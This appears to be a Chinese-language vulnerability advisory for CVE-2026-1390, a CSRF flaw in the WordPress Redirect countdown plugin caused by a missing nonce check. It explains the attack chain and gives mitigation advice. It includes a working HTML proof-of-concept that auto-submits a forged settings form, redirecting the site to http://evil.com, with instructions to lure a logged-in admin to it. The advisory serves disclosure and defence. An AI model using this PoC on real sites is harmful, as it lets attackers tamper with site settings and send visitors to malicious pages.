CVE-2026-1390 CVSS 4.3 中危

CVE-2026-1390 WordPress Redirect countdown插件CSRF漏洞

披露日期: 2026-03-21

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-1390

漏洞类型

跨站请求伪造（CSRF）

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

WordPress Redirect countdown Plugin

漏洞概述

WordPress的Redirect countdown插件在1.0及之前的版本中存在跨站请求伪造（CSRF）漏洞。由于`countdown_settings_content()`函数缺少nonce验证，未经身份验证的攻击者可诱导管理员点击恶意链接，从而修改插件设置，如倒计时超时、重定向URL等，造成潜在的安全风险。

技术细节

该漏洞源于WordPress插件开发中未正确实施安全验证机制。在`countdown_settings_content()`函数中，开发者未对用于更新插件设置的请求进行Nonce（Number used once）校验。Nonce是WordPress中防止CSRF攻击的关键令牌。攻击者可以构造一个恶意的HTML页面，其中包含指向目标WordPress站点设置页面的表单提交请求。当已登录的管理员访问该恶意页面时，浏览器会自动携带管理员的Session Cookie发送请求。由于服务器端缺少Nonce验证，该请求被误认为是管理员本人的合法操作，导致攻击者成功篡改插件配置，例如将重定向URL指向恶意网站。

攻击链分析

STEP 1

1. 构造攻击页面

攻击者创建一个包含恶意HTML表单的网页，表单中预设了想要修改的插件参数（如恶意重定向URL），并设置为自动提交。

STEP 2

2. 社会工程学诱导

攻击者通过钓鱼邮件或即时通讯工具，将恶意链接发送给目标WordPress网站的管理员，诱导其点击访问。

STEP 3

3. 触发伪造请求

当管理员在浏览器中保持登录状态访问该页面时，浏览器会自动执行脚本，向目标WordPress后台发送带有管理员凭证的配置修改请求。

STEP 4

4. 服务器处理请求

WordPress服务器接收到请求，由于插件缺少Nonce验证，无法区分请求来源是否合法，直接执行了设置更新操作。

STEP 5

5. 完成攻击

插件设置被成功篡改，例如倒计时被修改或重定向地址被更改，可能导致用户被重定向至恶意网站。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!--
PoC for CVE-2026-1390
Description: CSRF exploit to change plugin settings.
Usage: Host this file and trick the admin into opening it while logged in.
-->
<html>
  <body>
    <script>history.pushState('', '', '/')</script>
    <form action="http://target-site/wp-admin/options-general.php?page=redirect-countdown" method="POST">
      <input type="hidden" name="redirect_url" value="http://evil.com" />
      <input type="hidden" name="timeout" value="0" />
      <input type="hidden" name="custom_text" value="Hacked" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

影响范围

Redirect countdown <= 1.0

防御指南

临时缓解措施

建议暂时卸载该插件，直到官方发布修复版本。如果必须使用，应限制管理员账户的访问权限，并避免在登录管理后台的同时访问不明来源的链接。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表